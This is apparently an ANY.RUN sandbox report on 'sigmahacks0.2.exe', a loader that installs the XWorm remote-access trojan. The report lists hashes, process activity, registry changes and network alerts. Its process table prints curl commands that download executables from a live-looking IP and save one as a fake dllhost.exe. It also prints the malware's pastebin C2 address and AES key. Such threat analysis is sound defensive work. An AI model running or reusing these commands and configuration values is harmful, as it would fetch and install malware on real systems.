File name:

sigmahacks0.2.exe

Full analysis: https://app.any.run/tasks/89b1cc64-b261-4671-a158-6f6273f7a420
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: June 10, 2024, 14:51:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
evasion
xworm
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (console) Intel 80386, for MS Windows
MD5:

5F0F7FA98655C618B7FB9BCE8E01DCA0

SHA1:

B13E2EC9F71F916B4934200901A1BD85A7E19423

SHA256:

68F7A4CE68D84BDDE71CB6543D90E5E0E08602DB22F9B6388D31876C601FAC31

SSDEEP:

1536:XCYa+ihNuNMv2blAyHQ5MaAt7JmyxCV7tBKhilgVcRdMbgqOp:XCYa+0Nu6vQAkQ5S7JmyxCbBKhiTbMbW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • sigmahacks0.2.exe (PID: 3972)
      • curl.exe (PID: 4012)

    • XWORM has been detected (YARA)

      • dllhost.exe (PID: 4028)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • sigmahacks0.2.exe (PID: 3972)

    • Executing commands from a ".bat" file

      • sigmahacks0.2.exe (PID: 3972)

    • The process creates files with name similar to system file names

      • curl.exe (PID: 4012)

    • The executable file from the user directory is run by the CMD process

      • dllhost.exe (PID: 4028)

    • Executable content was dropped or overwritten

      • curl.exe (PID: 4012)

    • Connects to unusual port

      • curl.exe (PID: 4012)
      • curl.exe (PID: 4036)

    • Reads the Internet Settings

      • cmd.exe (PID: 4004)
      • dllhost.exe (PID: 4028)

    • Potential Corporate Privacy Violation

      • curl.exe (PID: 4012)

    • Checks for external IP

      • dllhost.exe (PID: 4028)

  • INFO

    • Checks supported languages

      • sigmahacks0.2.exe (PID: 3972)
      • curl.exe (PID: 4012)
      • dllhost.exe (PID: 4028)
      • curl.exe (PID: 4036)
      • wmpnscfg.exe (PID: 336)

    • Create files in a temporary directory

      • sigmahacks0.2.exe (PID: 3972)

    • Creates files or folders in the user directory

      • curl.exe (PID: 4012)

    • Reads the computer name

      • dllhost.exe (PID: 4028)
      • wmpnscfg.exe (PID: 336)

    • Reads the machine GUID from the registry

      • dllhost.exe (PID: 4028)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 336)

    • Disables trace logs

      • dllhost.exe (PID: 4028)

    • Reads Environment values

      • dllhost.exe (PID: 4028)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(4028) dllhost.exe
C2https://pastebin.com/raw/pw1j2xqz:<123456789>
Keys
AES<Xwormmm>
Options
Splitter3
Sleep timeAkee king
USB drop nameUSB.exe
MutexVoQgi7cuiO7Ae7H2
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (41)
.exe | Win64 Executable (generic) (36.3)
.dll | Win32 Dynamic Link Library (generic) (8.6)
.exe | Win32 Executable (generic) (5.9)
.exe | Win16/32 Executable Delphi generic (2.7)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:07:30 08:52:45+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 2.5
CodeSize: 70656
InitializedDataSize: 19456
UninitializedDataSize: -
EntryPoint: 0x1000
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
6
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start sigmahacks0.2.exe no specs cmd.exe no specs curl.exe #XWORM dllhost.exe curl.exe wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
336"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
3972"C:\Users\admin\AppData\Local\Temp\sigmahacks0.2.exe" C:\Users\admin\AppData\Local\Temp\sigmahacks0.2.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\appdata\local\temp\sigmahacks0.2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
4004"C:\Windows\system32\cmd" /c "C:\Users\admin\AppData\Local\Temp\3C9D.tmp\3C9E.tmp\3C9F.bat C:\Users\admin\AppData\Local\Temp\sigmahacks0.2.exe"C:\Windows\System32\cmd.exesigmahacks0.2.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
4012curl -s -o dllhost.exe "http://176.96.137.11:4000/download/wlms1.exe"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.5.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
4028dllhost.exe C:\Users\admin\AppData\Roaming\dllhost.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Exit code:
2148734499
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\roaming\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
XWorm
(PID) Process(4028) dllhost.exe
C2https://pastebin.com/raw/pw1j2xqz:<123456789>
Keys
AES<Xwormmm>
Options
Splitter3
Sleep timeAkee king
USB drop nameUSB.exe
MutexVoQgi7cuiO7Ae7H2
4036curl -s -o Ryver.exe "http://176.96.137.11:4000/download/RyverV.exe"C:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.5.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
Total events
1 981
Read events
1 969
Write events
12
Delete events
0

Modification events

(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4028) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dllhost_RASMANCS
Operation:writeName:ConsoleTracingMask
Value:
Executable files
1
Suspicious files
0
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
4012curl.exeC:\Users\admin\AppData\Roaming\dllhost.exeexecutable
MD5:E46D807A18380E6A7F1D6977989A3F46
SHA256:6BEA0DC4A9308DAFB8ECFFA2F3AA9404FFE8A4341C4AD93AAB5790526534A8E5
3972sigmahacks0.2.exeC:\Users\admin\AppData\Local\Temp\3C9D.tmp\3C9E.tmp\3C9F.battext
MD5:BA84B52DE7E1626E2D87C18FE32130FF
SHA256:508966997C99A47CF96EB518E366263BF4F2A858EF1B0381EC7563A5ACB52B1C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
6
DNS requests
1
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4028
dllhost.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
unknown
4012
curl.exe
GET
200
176.96.137.11:4000
http://176.96.137.11:4000/download/wlms1.exe
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
224.0.0.252:5355
unknown
4012
curl.exe
176.96.137.11:4000
dataforest GmbH
DE
unknown
4036
curl.exe
176.96.137.11:4000
dataforest GmbH
DE
unknown
4028
dllhost.exe
208.95.112.1:80
ip-api.com
TUT-AS
US
unknown

DNS requests

Domain
IP
Reputation
ip-api.com
  • 208.95.112.1
shared

Threats

PID
Process
Class
Message
4012
curl.exe
Attempted Information Leak
ET POLICY curl User-Agent Outbound
4012
curl.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
4012
curl.exe
Potentially Bad Traffic
ET HUNTING curl User-Agent to Dotted Quad
4012
curl.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
4012
curl.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
4012
curl.exe
Misc activity
ET INFO EXE - Served Attached HTTP
4012
curl.exe
Misc activity
ET INFO EXE CheckRemoteDebuggerPresent (Used in Malware Anti-Debugging)
4028
dllhost.exe
Device Retrieving External IP Address Detected
ET POLICY External IP Lookup ip-api.com
4028
dllhost.exe
Device Retrieving External IP Address Detected
POLICY [ANY.RUN] External Hosting Lookup by ip-api
Process
Message
dllhost.exe
CLR: Managed code called FailFast without specifying a reason.
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
sigmahacks0.2.exe